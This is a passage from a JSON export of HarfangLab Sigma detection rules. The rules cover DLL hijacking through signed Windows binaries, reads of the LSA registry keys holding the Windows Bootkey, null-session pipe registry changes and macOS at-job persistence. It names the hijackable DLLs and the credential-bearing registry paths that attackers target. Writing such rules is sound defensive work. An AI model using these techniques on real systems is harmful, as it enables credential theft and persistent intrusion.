"b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.588600Z", + "creation_date": "2026-03-23T11:45:34.588603Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.588611Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wusa.yml", + "content": "title: DLL Hijacking via wusa.exe\nid: 156f56a4-6a01-405e-9c87-d4546f76e6a1\ndescription: |\n Detects potential Windows DLL Hijacking via wusa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wusa.exe'\n ProcessSignature: 'Microsoft Windows'\n 
ImageLoaded|endswith:\n - '\\dpx.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "156f56a4-6a01-405e-9c87-d4546f76e6a1", + "rule_name": "DLL Hijacking via wusa.exe", + "rule_description": "Detects potential Windows DLL Hijacking via wusa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15957b9b-c39e-4caf-af47-506917f3c1e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095096Z", + "creation_date": "2026-03-23T11:45:34.095098Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095102Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40", + "https://attack.mitre.org/techniques/T1552/002/" + ], + "name": "t1003_002_susp_registry_read_bootkey.yml", + "content": "title: Windows Bootkey Read from Registry\nid: 15957b9b-c39e-4caf-af47-506917f3c1e2\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\n The BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\n This key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - 
classification.Windows.Source.Registry\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\DATA\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\DATA\\'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n filter_logonui:\n ProcessImage: '?:\\Windows\\System32\\logonui.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_setup_host:\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n # Altered versions of Windows can sometimes be unsigned.\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessParentOriginalFileName: 'SetupPrep.exe'\n\n # Too many fp, maybe a normal behavior in order to decode some information in registry\n exclusion_regedit:\n Image:\n - '?:\\Windows\\regedit.exe'\n - '?:\\Windows\\SysWOW64\\regedit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_ivanti:\n Image|endswith: '\\SupportToolkit.exe'\n ProcessOriginalFileName: 'SupportToolkit.exe'\n ProcessDescription: 'Ivanti Support Toolkit'\n\n exclusion_fennec_windows:\n ProcessOriginalFileName: 'Fox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* 
and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15957b9b-c39e-4caf-af47-506917f3c1e2", + "rule_name": "Windows Bootkey Read from Registry", + "rule_description": "Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\nThe BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\nThis key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n", + "rule_creation_date": "2024-04-02", + "rule_modified_date": "2025-09-25", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1012", + "attack.t1552.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.621211Z", 
+ "creation_date": "2026-03-23T11:45:34.621213Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.621217Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://web.archive.org/web/20230726161232/", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://attack.mitre.org/techniques/T1021/001/", + "https://attack.mitre.org/techniques/T1021/002/", + "https://attack.mitre.org/techniques/T1071/" + ], + "name": "t1021_001_nullsessionpipe_added_in_registry.yml", + "content": "title: Null Session Pipe Added in Registry\nid: 15aecbb0-3084-4252-96c2-c5ab1b3d4ea3\ndescription: |\n Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\n Attackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\n It is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\nreferences:\n - https://web.archive.org/web/20230726161232/\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n 
category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters\\NullSessionPipes'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_expressconnect:\n ProcessImage:\n - '?:\\Program Files\\ExpressConnect\\ExpressConnect.exe'\n - '?:\\Program Files (x86)\\ExpressConnect\\ExpressConnect.exe'\n\n exclusion_raps:\n ProcessImage: '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPS.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rivet Networks LLC'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_rivet:\n ProcessParentImage:\n - '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPSService.exe'\n - 
'?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KSPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendSoftAPService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendUtilityService.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n Details:\n - ';netlogon;samr'\n - ';netlogon;samr;lsarpc'\n\n exclusion_etiam:\n ProcessImage: '?:\\Program Files (x86)\\ETIAM\\IDA\\idaSCP.exe'\n\n exclusion_epson:\n ProcessImage|endswith: '\\PLPOUSVR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n\n exclusion_hp:\n ProcessImage|endswith: '\\flcdlock.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'HP Inc.'\n - 'Hewlett Packard Enterprise Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3", + "rule_name": "Null Session Pipe Added in Registry", + "rule_description": "Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\nAttackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\nIt is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\n", + "rule_creation_date": "2022-11-28", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.002", + "attack.t1071", + "attack.t1112", + "attack.t1562" + ], + "warnings": null, + 
"errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.587835Z", + "creation_date": "2026-03-23T11:45:34.587838Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587846Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_msitran.yml", + "content": "title: DLL Hijacking via MsiTran.exe\nid: 15cc636a-9f89-4eaa-b9fe-04eb31aca42e\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a 
non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiTran.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e", + "rule_name": "DLL Hijacking via MsiTran.exe", + "rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim 
application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-11-04", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593856Z", + "creation_date": "2026-03-23T11:45:34.593859Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593867Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", 
+ "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_logman.yml", + "content": "title: DLL Hijacking via Logman.exe\nid: 15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a\ndescription: |\n Detects potential Windows DLL Hijacking via Logman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Logman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\pdh.dll'\n - '\\pla.dll'\n - '\\sspicli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a", + "rule_name": "DLL Hijacking via Logman.exe", + "rule_description": "Detects potential Windows DLL Hijacking via Logman.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15f0e956-c482-487d-a3f5-28d5c667c6a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598362Z", + "creation_date": "2026-03-23T11:45:34.598366Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598374Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1053/002/" + ], + "name": "t1053_002_at_jobs_created.yml", + "content": "title: At Jobs Created\nid: 15f0e956-c482-487d-a3f5-28d5c667c6a3\ndescription: |\n Detects the creation of an at job file.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/07/23\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_files:\n - Path|startswith: '/private/var/at/jobs/'\n - TargetPath|startswith: '/private/var/at/jobs/'\n\n selection_access:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15f0e956-c482-487d-a3f5-28d5c667c6a3", + "rule_name": "At Jobs Created", + "rule_description": "Detects the creation of an at job file.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\n", + "rule_creation_date": "2024-07-23", + "rule_modified_date": 
"2025-10-29", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1053.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "15f6d712-e496-4981-8fd1-3626e0c36d24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097842Z", + "creation_date": "2026-03-23T11:45:34.097844Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097848Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_makecab.yml", + "content": "title: DLL Hijacking via makecab.exe\nid: 15f6d712-e496-4981-8fd1-3626e0c36d24\ndescription: |\n Detects potential Windows DLL Hijacking via makecab.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying 
legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'makecab.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "15f6d712-e496-4981-8fd1-3626e0c36d24", + "rule_name": "DLL Hijacking via makecab.exe", + "rule_description": "Detects potential Windows DLL Hijacking via makecab.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a 
